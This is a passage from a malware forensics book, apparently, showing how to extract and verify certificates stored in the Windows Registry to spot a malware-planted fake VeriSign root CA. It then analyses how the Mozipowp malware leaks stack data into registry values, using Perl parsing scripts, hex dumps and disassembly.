Each subkey has an additional subkey named Certificates, where you’ll find yet another subkey for each installed certificate of the given type. The certificates are stored in a REG_BINARY value named Blob, which contains the actual certificate. The malware that installed a fake VeriSign CA created a value named Blob under HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\ROOT\Certificates\uniqueid. The uniqueid field is either a hash of the certificate or a fingerprint. Figure 10-9 shows how you can view the raw data for one of the trusted root CA certificates.

Figure 10-9: Viewing certificates in the Registry


Extracting Certificates

The Registry stores certificates in DER format with a special Microsoft header. In Figure 10-9, we highlighted the beginning of the DER-encoded certificate in the Blob value. The actual certificate starts at offset 0x84, but this is not consistent across all certificates stored in the Registry. When you export certificates using Windows’ mmc snap-in for certificates or programmatically with PFXExportCertStore, the special header is automatically removed. However, if you pull raw data from the Registry, you have to remove the header yourself. With a bit of research, it should be possible to figure out how to correctly parse the header, but we took the easy way out. Instead of parsing Microsoft’s header, we wrote a Perl regular expression that finds the start of the DER certificate in the binary blob.

The script, which you can find on the book’s DVD, uses Parse::Win32Registry to automate the few steps described. It extracts certificates from a Registry hive file and saves them in a directory on disk. You can control the script with command-line parameters so that it only extracts certain types of certificates, or certificates that have a specified pattern in their subject (i.e., CN or Common Name) field. In addition, the script converts all DER certificates to PEM format so that it can verify them with OpenSSL.

The following is an example usage of the Perl script. First, print the usage:

perl for Parse::Win32Registry 0.51

 Dumps and prints details about installed PKI certificates. <filename> [subject] [-a] [-c] [-r] [-m]

    -a or --all       dump all certs listed below and also:

                           AuthRoot (non Microsoft root CA certs)

                           Disallowed (rejected/untrustworthy)

                           trust certs (enterprise trust certs)

                           TrustedPublisher (certs explicitly accepted)

    -c or --ca        dump CA (intermediate CA certs)

    -r or --root      dump ROOT (trusted root CA certs)

    -m or --my        dump MY (user's personal certs)

Figure 10-10 shows the syntax and output from extracting all ROOT CA certificates with the pattern “verisign class” (case-insensitive) in the subject field. We searched for this particular pattern based on the Sophos report of a malicious VeriSign Class 3 Code Signing certificate.

Figure 10-10: Extracting the malicious certificate with


At first glance, you can’t tell if the certificate in Figure 10-10 is legitimate or not. However, when you compare its attributes with the one reported by Sophos, you quickly see that it’s a match. For example, the fake certificate uses md5WithRSAEncryption as the signature algorithm, whereas the real one uses sha1WithRSAEncryption. If you don’t preemptively know a pattern to search, it is better to dump all certificates with the –a switch and allow OpenSSL to print attributes so you can inspect them in more detail.

Verifying Certs with OpenSSL

When using OpenSSL to verify certificates, sometimes you may find that even legitimate ones show up as self-signed. This is probably because the issuing CA’s public key is not available to OpenSSL. On Ubuntu, you can type apt-get install ca-certificates to install many of the common CA’s public keys on your machine. You’ll end up with over 200 individual certificates in /etc/ssl/certs and one PEM-formatted file in /etc/ssl/certs/ca-certificates.crt with all the certificates combined. Then you can either pass the directory to openssl with –CApath or pass the file to openssl with –CAfile. For more information, see Richard Bejtlich’s blog on Using Root Certificates with OpenSSL on FreeBSD.29




Recipe 10-10: Examining Malware that Leaks Data into the Registry


You can find supporting material for this recipe on companion DVD.

When an application uses RegSetValue or RegSetValueEx, it specifies the type of data being written to the Registry. Some acceptable data types include NULL-terminated strings (REG_SZ), multiple NULL-terminated strings (REG_MULTI_SZ), binary data (REG_BINARY), and unsigned longs (REG_DWORD). Tools, such as Regedit, format data according to the specified data type so that it’s easier to read. An issue arises when malware inserts binary data, but says it’s a REG_SZ type. In this case, Regedit treats the data as a string and displays only the characters up to the first NULL-terminating byte. Thus, it’s possible to hide data “behind” a string in the Registry.

This recipe shows you how to find binary data that’s disguised as a string. There are two main reasons you’ll find these types of artifacts. The most obvious is because of malware that intentionally writes binary data to a Registry value and specifies a type of REG_SZ. The less obvious, although much more intriguing, reason is that sometimes malware writes binary data to aREG_SZ type value by accident. This can happen if malware intends to write a NULL-terminated string but specifies that the string’s length is much larger than it actually is. Thus, RegSetValueEx loads the string and the excess bytes that exist in memory after the string. What you essentially have is a bug in the malware that leaks volatile data (which can contain clues about the program’s run-time state) into a more permanent storage area, such as the Registry.

Puzlpman and Mozipowp30 are examples of malware that accidentally leak information into the Registry. To demonstrate the concept, we installed a variant of Mozipowp onto a test machine. In Figure 10-11, you can see the values it creates under HKEY_CURRENT_USER\Identities. You would never know by the Regedit display, but there is a significant amount of binary data hiding behind the Curr version, Inst Date, Last Date, Popup count, Popup date, and Popup time values.

Figure 10-11: Examining the Mozipowp Registry entries in regedit



On the DVD that accompanies this book, you can find a Perl script called (we couldn’t think of a more descriptive name). This script is based on Parse::Win32Registry and it can help you identify binary data disguised as strings. It recursively searches through all keys, so you don’t have to preemptively know where to look. To test the script, we copied off the user’s NTUSER.DAT file from the Mozipowp-infected machine for examination and used the following commands. Notice that you can use the same script to find base64-encoded strings, PE files, dot-quad IP addresses, and HTTP URLs anywhere in the Registry.

perl for Parse::Win32Registry 0.51

 Dumps and prints details about interesting registry artifacts. <filename> [-a] [-b] [-p] [-i] [-h] [-s]

    -a or --all         dump all (everything below)

    -b or --base64      find base64 encoded strings

    -p or --pe          find pe files (dll/exe/sys)

    -i or --ipaddr      find dot quad ip addresses

    -h or --http        find http urls

    -s or --binstr      find binary data disguised as a string

 $ perl NTUSER.DAT -s


LastWrite Sat Jun 26 20:37:53 2010 (UTC)

Value: Last Date

Type: REG_SZ

       0  32003600 2d003600 2d003200 30003100 2.6.-.6.-.2.0.1.

      10  30000000 6d005000 72006f00 63005c00 0...m.P.r.o.c.\.

      20  6c007300 61007300 73002e00 65007800 l.s.a.s.s...e.x.

      30  65000000                            e...  


LastWrite Sat Jun 26 20:37:53 2010 (UTC)

Value: Popup time

Type: REG_SZ

       0 30000000 00000001 30e32200 e2e92243 0.......0."..."C

      10 00000000 00000000 e2e92200 3504917c ..........".5..|

      20 3e04917c 7d070000 08e22200 d8e52200 >..|}....."...".

      30 48e5                                H.  


LastWrite Sat Jun 26 20:37:53 2010 (UTC)

Value: Popup date

Type: REG_SZ

       0 30000000 6f006300 75006d00 65006e00 0...o.c.u.m.e.n.

      10 74007300 20006100 6e006400 20005300 t.s. .a.n.d. .S.

      20 65007400 74006900 6e006700 73005c00 e.t.t.i.n.g.s.\.

      30 4100                                A. 


The script identified the same values under HKEY_CURRENT_USER\Identities as mentioned before. In Figure 10-11, using Regedit, you saw the Last Date value containing 26-6-2010. However, in the output here, you see 26-6-2010 followed by some extraneous data—another Unicode string, mProc\lsass.exe. What is the significance of this extra string and where did it come from?

While you’re thinking, check out the Popup time value. It contains the Unicode string 0 which is 30 00 00 00 in hex (it is actually represented as 30000000 so the lines don’t wrap on the page). Everything after those four bytes is extraneous. Look very carefully and you’ll see some interesting values. For example, 7d 07 00 00 is 0x7D7, or 2007 decimal. Is this perhaps the year field from a date structure? Right before the possible year, you can find 35 04 91 7c (0x7c910435) and 3e 04 91 7c (0x7c91043e). On an XP system, it’s typical to find ntdll.dll mapped somewhere in this memory region. In fact, when we went back to look, ntdll.dll was loaded between 0x7c900000 and 0x7c9b2000. Both addresses in the Registry are within range of ntdll.dll. Why did we find addresses in the Registry?

Mozipowp Spilled the Beans

As it turns out, the malware author declared multiple fixed-size stack buffers to store the strings that it would later write into the Registry. It never zeroed out the stack buffer (for example, using memset) before copying the string into the buffer. The string’s length was much shorter than the buffer in which it was contained and then, as described previously, the malware wrote the entire buffer to the Registry with RegSetValueEx. Whatever was on the program’s stack at the time ended up at the end of each buffer, and thus became the extraneous data in the Registry.

Figure 10-12 shows a disassembly of ntdll.dll in IDA Pro. It proves that the 0x7c910435 and 0x7c91043e values we found are actually return addresses that remained on the stack from when the program previously called RtlAcquirePebLock. Windows API functions, such as GetEnvironmentVariable, make calls into RtlAcquirePebLock. This is very interesting because a post-mortem forensic analysis of a Registry hive is not supposed to show what API functions malware called prior to creating a Registry value!

Figure 10-12: Disassembly of RtlAcquirePebLock shows the addresses we found in the Registry.


How Much Data Gets Leaked?

But wait, there’s more! Figure 10-13 shows a decompilation (using the Hex-Rays plug-in for IDA Pro) of the function within the Mozipowp binary that creates the various Registry values. We’ve named the function SetRegistryValues. As an example, you can see the program declares a stack buffer like __int16 szLastDate[50]. The __int16 data type is the same as a WCHAR, which is a Unicode character. Thus, each __int16 is 16 bits (2 bytes). This means the buffer takes up 100 bytes on the stack. The malware uses wsprintfW to build a formatted string such as 26-6-2010, and copies it into the szLastDate buffer. This 10-character date string (including the trailing NULL) requires 20 of those 100 bytes, and the remaining 80 are untouched. When the malware usesRegSetValueEx, it specifies that the string’s length is 50 bytes. Therefore, 50 – 20 = 30 bytes of extraneous data gets leaked into the Registry!

What about Lsass?

Now, what about the significance of the mProc\lsass.exe string? We used IDA Pro to view a disassembly of the function that called SetRegistryValues. The calling function’s local variables would have existed on the stack if SetRegistryValues did not zero out its own stack buffers before usage. Sure enough, as you can see in Figure 10-14, the calling function uses GetEnvironmentVariableto find the application data path (i.e. C:\Documents and Settings\Username\Application Data). This explains why we found the return addresses from RtlAcquirePebLock. Then it appends \SystemProc\lsass.exe to the path, which explains why we found mProc\lsass.exe.

Figure 10-13: Decompilation using the Hex-Rays plug-in to create Registry values


Figure 10-14: The return addresses and lsass strings are artifacts from this function’s code.


In this recipe, you saw how it is possible to find binary data disguised as a string. Then you saw how to investigate the significance of the binary data by statically analyzing the malware’s executable. Using these clues, you gained further information about which APIs the malware called right before creating the Registry values and some other locations on disk where you may look for components of the malware. We’ll wrap up this recipe with the following points:

·           Mark Russinovich’s Reghide31 is a proof-of-concept tool that exploits character encodings between the Windows API and the native API. By creating a key in the Registry with a NULL character in its name, user mode applications such as regedit cannot open the key.

·           Halvar Flake presented Attacks on Uninitialized Local Variables33 at Black Hat Federal 2006. The talk described how it’s possible to control the values on a program’s stack if it fails to initialize its variables or zero out its buffers.

·           You can use, included with Parse::Win32Registry, to browse a Windows Registry hive on a Linux system. Because shows a hex dump of the data regardless of its data type, you can see the extraneous bytes that Regedit does not show.

·           For an entirely different type of Registry “slack space,” see Jolanta Thomassen’s dissertation titled Forensic Analysis of Unallocated Space in Windows Registry Hive Files.32